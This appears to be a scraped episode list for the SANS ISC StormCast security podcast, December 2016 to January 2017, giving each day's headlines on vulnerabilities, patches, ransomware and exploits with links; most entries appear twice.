Experimenting With IPv6 Fragments https://isc.sans.edu/forums/diary/How+to+Have+Fun+With+IPv6+Fragments+and+Scapy/21963/ Apple Updates Everything https://support.apple.com/en-us/HT201222 WebEx Secret Install URL https://bugs.chromium.org/p/project-zero/issues/detail?id=1096 Vulnerability in Symantec Norton Download Manager https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2017&suid=20170117_00 Exploit for Microsoft RDC Client on Mac https://www.wearesegment.com/research/Microsoft-Remote-Desktop-Client-for-Mac-Remote-Code-Execution
1/24/20175 minutes, 42 seconds
Episode Artwork

ISC StormCast for Tuesday, January 24th 2017

Experimenting With IPv6 Fragments https://isc.sans.edu/forums/diary/How+to+Have+Fun+With+IPv6+Fragments+and+Scapy/21963/ Apple Updates Everything https://support.apple.com/en-us/HT201222 WebEx Secret Install URL https://bugs.chromium.org/p/project-zero/issues/detail?id=1096 Vulnerability in Symantec Norton Download Manager https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2017&suid=20170117_00 Exploit for Microsoft RDC Client on Mac https://www.wearesegment.com/research/Microsoft-Remote-Desktop-Client-for-Mac-Remote-Code-Execution
1/24/20175 minutes, 42 seconds
Episode Artwork

ISC StormCast for Monday, January 23rd 2017

Sage 2.0 Ransomware https://isc.sans.edu/forums/diary/Sage+20+Ransomware/21959/ Starwars Twitter Botner https://regmedia.co.uk/2017/01/20/starwarsbotnet.pdf Symantec Messes Up SSL Certificates Again https://www.mail-archive.com/[email protected]/msg05455.html Github CSP Experiences https://githubengineering.com/githubs-post-csp-journey/ Podcast Survey https://www.surveymonkey.com/r/sbn2017
1/23/20175 minutes, 46 seconds
Episode Artwork

ISC StormCast for Monday, January 23rd 2017

Sage 2.0 Ransomware https://isc.sans.edu/forums/diary/Sage+20+Ransomware/21959/ Starwars Twitter Botner https://regmedia.co.uk/2017/01/20/starwarsbotnet.pdf Symantec Messes Up SSL Certificates Again https://www.mail-archive.com/[email protected]/msg05455.html Github CSP Experiences https://githubengineering.com/githubs-post-csp-journey/ Podcast Survey https://www.surveymonkey.com/r/sbn2017
1/23/20175 minutes, 46 seconds
Episode Artwork

ISC StormCast for Friday, January 20th 2017

Open Hadoop Instances Are At Risk http://www.threatgeek.com/2017/01/open-hadoop-installs-wiped-worldwide.html Upcoming SHA-1 Deadlines https://blog.mozilla.org/security/2016/10/18/phasing-out-sha-1-on-the-public-web/ Google "Verify Apps" Algorithm https://blog.google/topics/connected-workspaces/silence-speaks-louder-words-when-finding-malware/ Practical JSONP Injection https://securitycafe.ro/2017/01/18/practical-jsonp-injection/ Necurs Decline Huring Loky Distribution http://blog.talosintel.com/2017/01/locky-struggles.html
1/19/20176 minutes, 11 seconds
Episode Artwork

ISC StormCast for Friday, January 20th 2017

Open Hadoop Instances Are At Risk http://www.threatgeek.com/2017/01/open-hadoop-installs-wiped-worldwide.html Upcoming SHA-1 Deadlines https://blog.mozilla.org/security/2016/10/18/phasing-out-sha-1-on-the-public-web/ Google "Verify Apps" Algorithm https://blog.google/topics/connected-workspaces/silence-speaks-louder-words-when-finding-malware/ Practical JSONP Injection https://securitycafe.ro/2017/01/18/practical-jsonp-injection/ Necurs Decline Huring Loky Distribution http://blog.talosintel.com/2017/01/locky-struggles.html
1/19/20176 minutes, 11 seconds
Episode Artwork

ISC StormCast for Thursday, January 19th 2017

US-Cert Considers Netbios/SMBv1 Harmfull https://www.us-cert.gov/ncas/current-activity/2017/01/16/SMB-Security-Best-Practices IPv6 Atomic Fragments Can Lead to DDoS Attack https://tools.ietf.org/html/rfc8021 Facebook Was Affectd by ImageTragick Flaw http://4lemon.ru/2017-01-17_facebook_imagetragick_remote_code_execution.html Malwarebytes Identifies Old Mac Backdoor https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/ Oracle Quarterly Critical Patch Update http://www.oracle.com/technetwork/security-advisory/cpujan2017-2881727.html#AppendixJAVA
1/18/20176 minutes, 28 seconds
Episode Artwork

ISC StormCast for Thursday, January 19th 2017

US-Cert Considers Netbios/SMBv1 Harmfull https://www.us-cert.gov/ncas/current-activity/2017/01/16/SMB-Security-Best-Practices IPv6 Atomic Fragments Can Lead to DDoS Attack https://tools.ietf.org/html/rfc8021 Facebook Was Affectd by ImageTragick Flaw http://4lemon.ru/2017-01-17_facebook_imagetragick_remote_code_execution.html Malwarebytes Identifies Old Mac Backdoor https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/ Oracle Quarterly Critical Patch Update http://www.oracle.com/technetwork/security-advisory/cpujan2017-2881727.html#AppendixJAVA
1/18/20176 minutes, 28 seconds
Episode Artwork

ISC StormCast for Wednesday, January 18th 2017

domain_stats.py: A Web API For SEIM Phishing Hunts; https://isc.sans.edu/forums/diary/domainstatspy+a+web+api+for+SEIM+phishing+hunts/21943/ Mutiple RCE in ZyXEL/Billion/True Online Routers http://seclists.org/fulldisclosure/2017/Jan/40 Dovecot Passes Security Audit https://wiki.mozilla.org/images/4/4d/Dovecot-report.pdf Dutch Web Developers Left Backdoors Behind http://www.theregister.co.uk/2017/01/17/police_warn_of_dutch_developer_who_built_backdoors_for_carding/ Mobile Applications Contain Secrets https://hackernoon.com/we-reverse-engineered-16k-apps-heres-what-we-found-51bdf3b456bb
1/17/20175 minutes, 19 seconds
Episode Artwork

ISC StormCast for Wednesday, January 18th 2017

domain_stats.py: A Web API For SEIM Phishing Hunts; https://isc.sans.edu/forums/diary/domainstatspy+a+web+api+for+SEIM+phishing+hunts/21943/ Mutiple RCE in ZyXEL/Billion/True Online Routers http://seclists.org/fulldisclosure/2017/Jan/40 Dovecot Passes Security Audit https://wiki.mozilla.org/images/4/4d/Dovecot-report.pdf Dutch Web Developers Left Backdoors Behind http://www.theregister.co.uk/2017/01/17/police_warn_of_dutch_developer_who_built_backdoors_for_carding/ Mobile Applications Contain Secrets https://hackernoon.com/we-reverse-engineered-16k-apps-heres-what-we-found-51bdf3b456bb
1/17/20175 minutes, 19 seconds
Episode Artwork

ISC StormCast for Tuesday, January 17th 2017

Whitelisting File Extensions in Apache https://isc.sans.edu/forums/diary/Whitelisting+File+Extensions+in+Apache/21937/ Wordpress 4.7.1 Updates PHPMailer https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/ Tricky Phishing Attacks Harvesting Google Passwords https://www.wordfence.com/blog/2017/01/gmail-phishing-data-uri/ More Refined Browser Fingerprinting Via GPU Features https://drive.google.com/file/d/0B4s900Byvv1ibW5uc1NiU2g3R3c/view
1/16/20175 minutes, 27 seconds
Episode Artwork

ISC StormCast for Tuesday, January 17th 2017

Whitelisting File Extensions in Apache https://isc.sans.edu/forums/diary/Whitelisting+File+Extensions+in+Apache/21937/ Wordpress 4.7.1 Updates PHPMailer https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/ Tricky Phishing Attacks Harvesting Google Passwords https://www.wordfence.com/blog/2017/01/gmail-phishing-data-uri/ More Refined Browser Fingerprinting Via GPU Features https://drive.google.com/file/d/0B4s900Byvv1ibW5uc1NiU2g3R3c/view
1/16/20175 minutes, 27 seconds
Episode Artwork

ISC StormCast for Monday, January 16th 2017

Backup Files Are Good if They are Outside Your Web Servers Document Root https://isc.sans.edu/forums/diary/Backup+Files+Are+Good+but+Can+Be+Evil/21935/ Exploiting Apache Server Status http://blog.mazinahmed.net/2017/01/exploiting-misconfigured-apache-server-status-instances.html WhatsApp Backdoor Controversy https://www.theguardian.com/technology/2017/jan/13/whatsapp-backdoor-allows-snooping-on-encrypted-messages https://whispersystems.org/blog/there-is-no-whatsapp-backdoor/ Hardening Windows 10 https://blogs.technet.microsoft.com/mmpc/2017/01/13/hardening-windows-10-with-zero-day-exploit-mitigations/ Injecting JavaScript Into PDFs http://insert-script.blogspot.in/2016/10/pdf-how-to-steal-pdfs-by-injecting.html
1/15/20177 minutes, 22 seconds
Episode Artwork

ISC StormCast for Monday, January 16th 2017

Backup Files Are Good if They are Outside Your Web Servers Document Root https://isc.sans.edu/forums/diary/Backup+Files+Are+Good+but+Can+Be+Evil/21935/ Exploiting Apache Server Status http://blog.mazinahmed.net/2017/01/exploiting-misconfigured-apache-server-status-instances.html WhatsApp Backdoor Controversy https://www.theguardian.com/technology/2017/jan/13/whatsapp-backdoor-allows-snooping-on-encrypted-messages https://whispersystems.org/blog/there-is-no-whatsapp-backdoor/ Hardening Windows 10 https://blogs.technet.microsoft.com/mmpc/2017/01/13/hardening-windows-10-with-zero-day-exploit-mitigations/ Injecting JavaScript Into PDFs http://insert-script.blogspot.in/2016/10/pdf-how-to-steal-pdfs-by-injecting.html
1/15/20177 minutes, 22 seconds
Episode Artwork

ISC StormCast for Friday, January 13th 2017

System Resources Utilization Monitor #SRUM https://isc.sans.edu/forums/diary/System+Resource+Utilization+Monitor/21927/ Docker Fixes Privilege Escalation Vulnerability http://seclists.org/fulldisclosure/2017/Jan/21 Taking Over Expired Name Servers https://thehackerblog.com/respect-my-authority-hijacking-broken-nameservers-to-compromise-your-target/ Updated Certificate Revocation Data https://isc.sans.edu/crls.html Shadow Broker Releasing More Tools and Going Dark https://heimdalsecurity.com/blog/security-alert-the-shadow-brokers-windows-hacking-tools/ Extracting Fingerprints from Selfies http://www.japantimes.co.jp/news/2017/01/11/national/crime-legal/researchers-warn-fingerprint-theft-peace-sign/
1/13/20176 minutes, 28 seconds
Episode Artwork

ISC StormCast for Friday, January 13th 2017

System Resources Utilization Monitor #SRUM https://isc.sans.edu/forums/diary/System+Resource+Utilization+Monitor/21927/ Docker Fixes Privilege Escalation Vulnerability http://seclists.org/fulldisclosure/2017/Jan/21 Taking Over Expired Name Servers https://thehackerblog.com/respect-my-authority-hijacking-broken-nameservers-to-compromise-your-target/ Updated Certificate Revocation Data https://isc.sans.edu/crls.html Shadow Broker Releasing More Tools and Going Dark https://heimdalsecurity.com/blog/security-alert-the-shadow-brokers-windows-hacking-tools/ Extracting Fingerprints from Selfies http://www.japantimes.co.jp/news/2017/01/11/national/crime-legal/researchers-warn-fingerprint-theft-peace-sign/
1/13/20176 minutes, 28 seconds
Episode Artwork

ISC StormCast for Thursday, January 12th 2017

Hancitor/Pny/Vawtrak installed by Malicious Word Document in Fake Parking Ticket E-Mail https://isc.sans.edu/forums/diary/HancitorPonyVawtrak+malspam/21919/ Godaddy Revokes > 6,000 SSL Certs After Validation Bug https://www.godaddy.com/garage/godaddy/information-about-ssl-bug/ DVR Master Password List Leaked https://www.pentestpartners.com/blog/leaked-dvr-creds-added-to-the-iot-fail-list/ Autofill Enables Information Leakage https://github.com/anttiviljami/browser-autofill-phishing
1/12/20176 minutes, 4 seconds
Episode Artwork

ISC StormCast for Thursday, January 12th 2017

Hancitor/Pny/Vawtrak installed by Malicious Word Document in Fake Parking Ticket E-Mail https://isc.sans.edu/forums/diary/HancitorPonyVawtrak+malspam/21919/ Godaddy Revokes > 6,000 SSL Certs After Validation Bug https://www.godaddy.com/garage/godaddy/information-about-ssl-bug/ DVR Master Password List Leaked https://www.pentestpartners.com/blog/leaked-dvr-creds-added-to-the-iot-fail-list/ Autofill Enables Information Leakage https://github.com/anttiviljami/browser-autofill-phishing
1/12/20176 minutes, 4 seconds
Episode Artwork

ISC StormCast for Wednesday, January 11th 2017

Microsoft Patch Tuesday Summary https://isc.sans.edu/forums/diary/January+2017+Microsoft+Patch+Tuesday/21915/ Adobe Patch Tuesday Summary https://isc.sans.edu/forums/diary/Adobe+January+2017+Patches/21917/ Port 37777 "MapTable" Requests https://isc.sans.edu/forums/diary/Port+37777+MapTable+Requests/21913/ CVE 2016-7200/7201 Exploit Included in Sundown Exploit Kit http://malware.dontneedcoffee.com/2017/01/CVE-2016-7200-7201.html
1/11/20175 minutes, 35 seconds
Episode Artwork

ISC StormCast for Wednesday, January 11th 2017

Microsoft Patch Tuesday Summary https://isc.sans.edu/forums/diary/January+2017+Microsoft+Patch+Tuesday/21915/ Adobe Patch Tuesday Summary https://isc.sans.edu/forums/diary/Adobe+January+2017+Patches/21917/ Port 37777 "MapTable" Requests https://isc.sans.edu/forums/diary/Port+37777+MapTable+Requests/21913/ CVE 2016-7200/7201 Exploit Included in Sundown Exploit Kit http://malware.dontneedcoffee.com/2017/01/CVE-2016-7200-7201.html
1/11/20175 minutes, 35 seconds
Episode Artwork

ISC StormCast for Tuesday, January 10th 2017

Damn Vulnerable Web Sockets (DVWS) Demonstrates WebSocket Vulnerabilities https://github.com/interference-security/DVWS St. Jude Medical Patches Vulnerable Cardiac Devices https://threatpost.com/st-jude-medical-patches-vulnerable-cardiac-devices/122955/ Cracking Hashes of Passwords 12 Characters and Longer http://www.netmux.com/blog/cracking-12-character-above-passwords VNC Library Update https://www.debian.org/security/2017/dsa-3753
1/9/20175 minutes, 47 seconds
Episode Artwork

ISC StormCast for Tuesday, January 10th 2017

Damn Vulnerable Web Sockets (DVWS) Demonstrates WebSocket Vulnerabilities https://github.com/interference-security/DVWS St. Jude Medical Patches Vulnerable Cardiac Devices https://threatpost.com/st-jude-medical-patches-vulnerable-cardiac-devices/122955/ Cracking Hashes of Passwords 12 Characters and Longer http://www.netmux.com/blog/cracking-12-character-above-passwords VNC Library Update https://www.debian.org/security/2017/dsa-3753
1/9/20175 minutes, 47 seconds
Episode Artwork

ISC StormCast for Monday, January 9th 2017

Careful With Security Tools That Submit Files to Virustotal https://isc.sans.edu/forums/diary/Great+Misadventures+of+Security+Vendors+Absurd+Sandboxing+Edition/21895/ Vulnerable Security Tools Can Be Used Against You https://isc.sans.edu/forums/diary/Using+Security+Tools+to+Compromize+a+Network/21903/ Elaborate Ransomware Attacks http://www.actionfraud.police.uk/news/department-of-education-ransomware-alert-jan17 E-Mail and iTunes Popup Extortion https://blog.malwarebytes.com/101/mac-the-basics/2017/01/tech-support-scam-page-attempts-denial-of-service-via-mail-app/
1/9/20175 minutes, 45 seconds
Episode Artwork

ISC StormCast for Monday, January 9th 2017

Careful With Security Tools That Submit Files to Virustotal https://isc.sans.edu/forums/diary/Great+Misadventures+of+Security+Vendors+Absurd+Sandboxing+Edition/21895/ Vulnerable Security Tools Can Be Used Against You https://isc.sans.edu/forums/diary/Using+Security+Tools+to+Compromize+a+Network/21903/ Elaborate Ransomware Attacks http://www.actionfraud.police.uk/news/department-of-education-ransomware-alert-jan17 E-Mail and iTunes Popup Extortion https://blog.malwarebytes.com/101/mac-the-basics/2017/01/tech-support-scam-page-attempts-denial-of-service-via-mail-app/
1/9/20175 minutes, 45 seconds
Episode Artwork

ISC StormCast for Friday, January 6th 2017

Google.com.br DNS Hijack https://www.linkedin.com/pulse/googlecombr-hacked-renato-marinho Attackers Use Stolen Passwords To Take Over Spreadshirt.com Accounts. https://www.heise.de/security/meldung/Angriff-auf-Spreadshirt-Konten-3589579.html (sorry, only in German) Ransomware Adding DDoS Component https://www.bleepingcomputer.com/news/security/firecrypt-ransomware-comes-with-a-ddos-component/ Old Malware Returning in Targeted Attacks https://blogs.forcepoint.com/security-labs/mm-core-memory-backdoor-returns-bigboss-and-sillygoose
1/6/20176 minutes, 1 second
Episode Artwork

ISC StormCast for Friday, January 6th 2017

Google.com.br DNS Hijack https://www.linkedin.com/pulse/googlecombr-hacked-renato-marinho Attackers Use Stolen Passwords To Take Over Spreadshirt.com Accounts. https://www.heise.de/security/meldung/Angriff-auf-Spreadshirt-Konten-3589579.html (sorry, only in German) Ransomware Adding DDoS Component https://www.bleepingcomputer.com/news/security/firecrypt-ransomware-comes-with-a-ddos-component/ Old Malware Returning in Targeted Attacks https://blogs.forcepoint.com/security-labs/mm-core-memory-backdoor-returns-bigboss-and-sillygoose
1/6/20176 minutes, 1 second
Episode Artwork

ISC StormCast for Thursday, January 5th 2017

GRE Packets May Be Related To Linux Kernel Bug http://www.openwall.com/lists/oss-security/2016/10/13/11 Insecure MongoDB Instances Hit By Fake Ransomware https://twitter.com/0xDUDE Android Security Update https://source.android.com/security/bulletin/2017-01-01.html Identifying WordPress Websites on Local Networks https://www.netsparker.com/blog/web-security/bruteforce-wordpress-local-networks-xshm-attack/
1/5/20175 minutes, 24 seconds
Episode Artwork

ISC StormCast for Thursday, January 5th 2017

GRE Packets May Be Related To Linux Kernel Bug http://www.openwall.com/lists/oss-security/2016/10/13/11 Insecure MongoDB Instances Hit By Fake Ransomware https://twitter.com/0xDUDE Android Security Update https://source.android.com/security/bulletin/2017-01-01.html Identifying WordPress Websites on Local Networks https://www.netsparker.com/blog/web-security/bruteforce-wordpress-local-networks-xshm-attack/
1/5/20175 minutes, 24 seconds
Episode Artwork

ISC StormCast for Wednesday, January 4th 2017

Removing "Ransom Ware" From Android Based LG TVs https://www.youtube.com/watch?v=0WZ4uLFTHEE libpng Patches 30 Year Old Bug http://www.slackware.com/security/viewer.php?l=slackware-security&y=2016&m=slackware-security.567619 Kaspersky Antivirus SSL Interception Vulnerability https://bugs.chromium.org/p/project-zero/issues/detail?id=978 Thunderbird Update Fixes Critical Vulnerability https://www.mozilla.org/en-US/security/advisories/mfsa2016-96/
1/3/20174 minutes, 58 seconds
Episode Artwork

ISC StormCast for Wednesday, January 4th 2017

Removing "Ransom Ware" From Android Based LG TVs https://www.youtube.com/watch?v=0WZ4uLFTHEE libpng Patches 30 Year Old Bug http://www.slackware.com/security/viewer.php?l=slackware-security&y=2016&m=slackware-security.567619 Kaspersky Antivirus SSL Interception Vulnerability https://bugs.chromium.org/p/project-zero/issues/detail?id=978 Thunderbird Update Fixes Critical Vulnerability https://www.mozilla.org/en-US/security/advisories/mfsa2016-96/
1/3/20174 minutes, 58 seconds
Episode Artwork

ISC StormCast for Tuesday, January 3rd 2017

AT&T 2G Network Shutdown https://www.att.com/esupport/article.html#!/wireless/KM1084805 Leap Second https://blog.cloudflare.com/how-and-why-the-leap-second-affected-cloudflare-dns/ Thunderbird Patch https://www.heise.de/security/meldung/Thunderbird-Mozilla-schliesst-mit-Sicherheitsupdate-kritische-Luecken-3583472.html iMessage Crash https://vincedes3.com/crash-message-app-iphone/ Truffle Hog https://github.com/dxa4481/truffleHog
1/3/20175 minutes, 6 seconds
Episode Artwork

ISC StormCast for Tuesday, January 3rd 2017

AT&T 2G Network Shutdown https://www.att.com/esupport/article.html#!/wireless/KM1084805 Leap Second https://blog.cloudflare.com/how-and-why-the-leap-second-affected-cloudflare-dns/ Thunderbird Patch https://www.heise.de/security/meldung/Thunderbird-Mozilla-schliesst-mit-Sicherheitsupdate-kritische-Luecken-3583472.html iMessage Crash https://vincedes3.com/crash-message-app-iphone/ Truffle Hog https://github.com/dxa4481/truffleHog
1/3/20175 minutes, 6 seconds
Episode Artwork

ISC StormCast for Friday, December 30th 2016

Protocol 47 (GRE) Traffic https://isc.sans.edu/forums/diary/Increase+in+Protocol+47+denys/21865/ US Cert Releases "Grizzly Steppe" Report https://www.us-cert.gov/security-publications/GRIZZLY-STEPPE-Russian-Malicious-Cyber-Activity Android Malware Changes Router DNS Settings https://securelist.com/blog/mobile/76969/switcher-android-joins-the-attack-the-router-club/
12/30/20163 minutes, 57 seconds
Episode Artwork

ISC StormCast for Friday, December 30th 2016

Protocol 47 (GRE) Traffic https://isc.sans.edu/forums/diary/Increase+in+Protocol+47+denys/21865/ US Cert Releases "Grizzly Steppe" Report https://www.us-cert.gov/security-publications/GRIZZLY-STEPPE-Russian-Malicious-Cyber-Activity Android Malware Changes Router DNS Settings https://securelist.com/blog/mobile/76969/switcher-android-joins-the-attack-the-router-club/
12/30/20163 minutes, 57 seconds
Episode Artwork

ISC StormCast for Thursday, December 29th 2016

More PHPMailer Issues. Update Again https://github.com/PHPMailer/PHPMailer/wiki/About-the-CVE-2016-10033-and-CVE-2016-10045-vulnerabilities CCC Talk: Lockpicking in the IoT https://media.ccc.de/v/33c3-8019-lockpicking_in_the_iot CCC Talk: IPv6 Scanning https://media.ccc.de/v/33c3-8061-you_can_-j_reject_but_you_can_not_hide_global_scanning_of_the_ipv6_internet
12/29/20165 minutes
Episode Artwork

ISC StormCast for Thursday, December 29th 2016

More PHPMailer Issues. Update Again https://github.com/PHPMailer/PHPMailer/wiki/About-the-CVE-2016-10033-and-CVE-2016-10045-vulnerabilities CCC Talk: Lockpicking in the IoT https://media.ccc.de/v/33c3-8019-lockpicking_in_the_iot CCC Talk: IPv6 Scanning https://media.ccc.de/v/33c3-8061-you_can_-j_reject_but_you_can_not_hide_global_scanning_of_the_ipv6_internet
12/29/20165 minutes
Episode Artwork

ISC StormCast for Wednesday, December 28th 2016

Using Daemonlogger as a Software Tap https://isc.sans.edu/forums/diary/Using+daemonlogger+as+a+Software+Tap/21859/ CCC Conference https://events.ccc.de/congress/2016/wiki/Main_Page PHPMailer Exploit Released https://legalhackers.com/exploits/CVE-2016-10033/PHPMailer-RCE-exploit-poc.txt Patch For Exim Mail Server https://exim.org/static/doc/CVE-2016-9963.txt Signal Uses Domain Fronting To Evade Censor Ship https://whispersystems.org/blog/doodles-stickers-censorship/
12/28/20165 minutes, 32 seconds
Episode Artwork

ISC StormCast for Wednesday, December 28th 2016

Using Daemonlogger as a Software Tap https://isc.sans.edu/forums/diary/Using+daemonlogger+as+a+Software+Tap/21859/ CCC Conference https://events.ccc.de/congress/2016/wiki/Main_Page PHPMailer Exploit Released https://legalhackers.com/exploits/CVE-2016-10033/PHPMailer-RCE-exploit-poc.txt Patch For Exim Mail Server https://exim.org/static/doc/CVE-2016-9963.txt Signal Uses Domain Fronting To Evade Censor Ship https://whispersystems.org/blog/doodles-stickers-censorship/
12/28/20165 minutes, 32 seconds
Episode Artwork

ISC StormCast for Tuesday, December 27th 2016

Criticial RCE Flaw in PHPMailer https://isc.sans.edu/forums/diary/Critical+security+update+PHPMailer+5218+CVE201610033/21855/ Malware Delays Execution with "Ping" https://isc.sans.edu/forums/diary/Pinging+All+The+Way/21849/ Apple Extends TLS Deadline https://isc.sans.edu/forums/diary/Pinging+All+The+Way/21849/
12/27/20166 minutes, 2 seconds
Episode Artwork

ISC StormCast for Tuesday, December 27th 2016

Criticial RCE Flaw in PHPMailer https://isc.sans.edu/forums/diary/Critical+security+update+PHPMailer+5218+CVE201610033/21855/ Malware Delays Execution with "Ping" https://isc.sans.edu/forums/diary/Pinging+All+The+Way/21849/ Apple Extends TLS Deadline https://isc.sans.edu/forums/diary/Pinging+All+The+Way/21849/
12/27/20166 minutes, 2 seconds
Episode Artwork

ISC StormCast for Thursday, December 22nd 2016

Mirai Trying Various Telnet Alternatives https://isc.sans.edu/forums/diary/UPDATED+x1+Mirai+Scanning+for+Port+6789+Looking+for+New+Victims+Now+hitting+tcp23231/21833/ Ukraining Power Outages http://uawire.org/news/ukrenergo-claims-that-blackouts-in-kyiv-could-have-been-caused-by-hackers OurMine Hacks Netflix and Other Twitter Accounts http://www.bbc.com/news/technology-38390343?ocid=socialflow_twitter Methbot Generating Millions of Dollars With Click Fraud http://go.whiteops.com/rs/179-SQE-823/images/WO_Methbot_Operation_WP.pdf
12/21/20164 minutes, 37 seconds
Episode Artwork

ISC StormCast for Thursday, December 22nd 2016

Mirai Trying Various Telnet Alternatives https://isc.sans.edu/forums/diary/UPDATED+x1+Mirai+Scanning+for+Port+6789+Looking+for+New+Victims+Now+hitting+tcp23231/21833/ Ukraining Power Outages http://uawire.org/news/ukrenergo-claims-that-blackouts-in-kyiv-could-have-been-caused-by-hackers OurMine Hacks Netflix and Other Twitter Accounts http://www.bbc.com/news/technology-38390343?ocid=socialflow_twitter Methbot Generating Millions of Dollars With Click Fraud http://go.whiteops.com/rs/179-SQE-823/images/WO_Methbot_Operation_WP.pdf
12/21/20164 minutes, 37 seconds
Episode Artwork

ISC StormCast for Wednesday, December 21st 2016

vSphere Data Protection Known SSH Key http://www.vmware.com/security/advisories/VMSA-2016-0024.html nmap Update https://nmap.org/download.html SCCM Software Metering https://www.fireeye.com/blog/threat-research/2016/12/do_you_see_what_icc.html CryptXXX Version 3 Decryptor Available https://noransom.kaspersky.com Airline Inflight Entertainment System Hack http://blog.ioactive.com/2016/12/in-flight-hacking-system.html SEC503, Intrusion Detection in Depth: Brussles January 16th-21st 2017 https://www.sans.org/event/brussels-winter-2017/course/intrusion-detection-in-depth
12/21/20165 minutes, 5 seconds
Episode Artwork

ISC StormCast for Wednesday, December 21st 2016

vSphere Data Protection Known SSH Key http://www.vmware.com/security/advisories/VMSA-2016-0024.html nmap Update https://nmap.org/download.html SCCM Software Metering https://www.fireeye.com/blog/threat-research/2016/12/do_you_see_what_icc.html CryptXXX Version 3 Decryptor Available https://noransom.kaspersky.com Airline Inflight Entertainment System Hack http://blog.ioactive.com/2016/12/in-flight-hacking-system.html SEC503, Intrusion Detection in Depth: Brussles January 16th-21st 2017 https://www.sans.org/event/brussels-winter-2017/course/intrusion-detection-in-depth
12/21/20165 minutes, 5 seconds
Episode Artwork

ISC StormCast for Tuesday, December 20th 2016

Mirai Likely Behind Port 6789 Scans. Yet Another Backdoor https://isc.sans.edu/forums/diary/Mirai+Scanning+for+Port+6789+Looking+for+New+Victims/21833/ OpenSSH update https://www.openssh.com/releasenotes.html#7.4 Google Releases Tool to Audit Crypto Libraries https://security.googleblog.com/2016/12/project-wycheproof.html Escaping A Restricted Shell https://humblesec.wordpress.com/2016/12/08/escaping-a-restricted-shell/
12/20/20164 minutes, 17 seconds
Episode Artwork

ISC StormCast for Tuesday, December 20th 2016

Mirai Likely Behind Port 6789 Scans. Yet Another Backdoor https://isc.sans.edu/forums/diary/Mirai+Scanning+for+Port+6789+Looking+for+New+Victims/21833/ OpenSSH update https://www.openssh.com/releasenotes.html#7.4 Google Releases Tool to Audit Crypto Libraries https://security.googleblog.com/2016/12/project-wycheproof.html Escaping A Restricted Shell https://humblesec.wordpress.com/2016/12/08/escaping-a-restricted-shell/
12/20/20164 minutes, 17 seconds
Episode Artwork

ISC StormCast for Monday, December 19th 2016

Verizon Webmail XSS Exploit https://randywestergren.com/persistent-xss-verizons-webmail-client/ Blocking Powershell Connections via Windows Firewall https://isc.sans.edu/forums/diary/Blocking+Powershell+Connection+via+Windows+Firewall/21829/ Exploit Kits Delivering Cerber Ransomware https://isc.sans.edu/forums/diary/One+if+by+email+and+two+if+by+EK+The+Cerbers+are+coming/21823/ More Security Companies joining "No More Ransom" https://www.nomoreransom.org IT Contractor Trying to Take Over Radio Station https://regmedia.co.uk/2016/12/16/kcohvtaylorfiling.pdf Holiday Safe Computing Tips https://isc.sans.edu/forums/diary/Holiday+Safe+Computing+Tips/21827/
12/19/20165 minutes, 52 seconds
Episode Artwork

ISC StormCast for Monday, December 19th 2016

Verizon Webmail XSS Exploit https://randywestergren.com/persistent-xss-verizons-webmail-client/ Blocking Powershell Connections via Windows Firewall https://isc.sans.edu/forums/diary/Blocking+Powershell+Connection+via+Windows+Firewall/21829/ Exploit Kits Delivering Cerber Ransomware https://isc.sans.edu/forums/diary/One+if+by+email+and+two+if+by+EK+The+Cerbers+are+coming/21823/ More Security Companies joining "No More Ransom" https://www.nomoreransom.org IT Contractor Trying to Take Over Radio Station https://regmedia.co.uk/2016/12/16/kcohvtaylorfiling.pdf Holiday Safe Computing Tips https://isc.sans.edu/forums/diary/Holiday+Safe+Computing+Tips/21827/
12/19/20165 minutes, 52 seconds
Episode Artwork

ISC StormCast for Friday, December 16th 2016

Domain Cops Malware Analysis https://isc.sans.edu/forums/diary/Domaincop+malpsam/21821/ OS X Filevault Password Retrieval http://blog.frizk.net/2016/12/filevault-password-retrieval.html QEMU/Xen Vulnerability http://xenbits.xen.org/xsa/advisory-199.html DNS Changer Attacking Home Routers https://www.proofpoint.com/us/threat-insight/post/home-routers-under-attack-malvertising-windows-android-devices
12/16/20165 minutes, 25 seconds
Episode Artwork

ISC StormCast for Friday, December 16th 2016

Domain Cops Malware Analysis https://isc.sans.edu/forums/diary/Domaincop+malpsam/21821/ OS X Filevault Password Retrieval http://blog.frizk.net/2016/12/filevault-password-retrieval.html QEMU/Xen Vulnerability http://xenbits.xen.org/xsa/advisory-199.html DNS Changer Attacking Home Routers https://www.proofpoint.com/us/threat-insight/post/home-routers-under-attack-malvertising-windows-android-devices
12/16/20165 minutes, 25 seconds
Episode Artwork

ISC StormCast for Thursday, December 15th 2016

Malicious JavaScript Bypasses UAC https://isc.sans.edu/forums/diary/UAC+Bypass+in+JScript+Dropper/21813/ Skype Unauthorized API Access Blocked https://www.trustwave.com/Resources/SpiderLabs-Blog/A-Backdoor-in-Skype-for-Mac-OS-X/?page=1&year=0&month=0 Facebook Anounces Certificate Transparency Monitoring Tool https://www.facebook.com/notes/protect-the-graph/introducing-our-certificate-transparency-monitoring-tool/1811919779048165 Another Tor Browser (and Firefox) Bug Fixed https://blog.torproject.org/blog/tor-browser-608-released Cheap Android Phones Arrive With Malware Preinstalled https://news.drweb.com/show/?i=10345&lng=en Exploit for Nagios https://legalhackers.com/advisories/Nagios-Exploit-Command-Injection-CVE-2016-9565-2008-4796.html
12/15/20165 minutes, 28 seconds
Episode Artwork

ISC StormCast for Thursday, December 15th 2016

Malicious JavaScript Bypasses UAC https://isc.sans.edu/forums/diary/UAC+Bypass+in+JScript+Dropper/21813/ Skype Unauthorized API Access Blocked https://www.trustwave.com/Resources/SpiderLabs-Blog/A-Backdoor-in-Skype-for-Mac-OS-X/?page=1&year=0&month=0 Facebook Anounces Certificate Transparency Monitoring Tool https://www.facebook.com/notes/protect-the-graph/introducing-our-certificate-transparency-monitoring-tool/1811919779048165 Another Tor Browser (and Firefox) Bug Fixed https://blog.torproject.org/blog/tor-browser-608-released Cheap Android Phones Arrive With Malware Preinstalled https://news.drweb.com/show/?i=10345&lng=en Exploit for Nagios https://legalhackers.com/advisories/Nagios-Exploit-Command-Injection-CVE-2016-9565-2008-4796.html
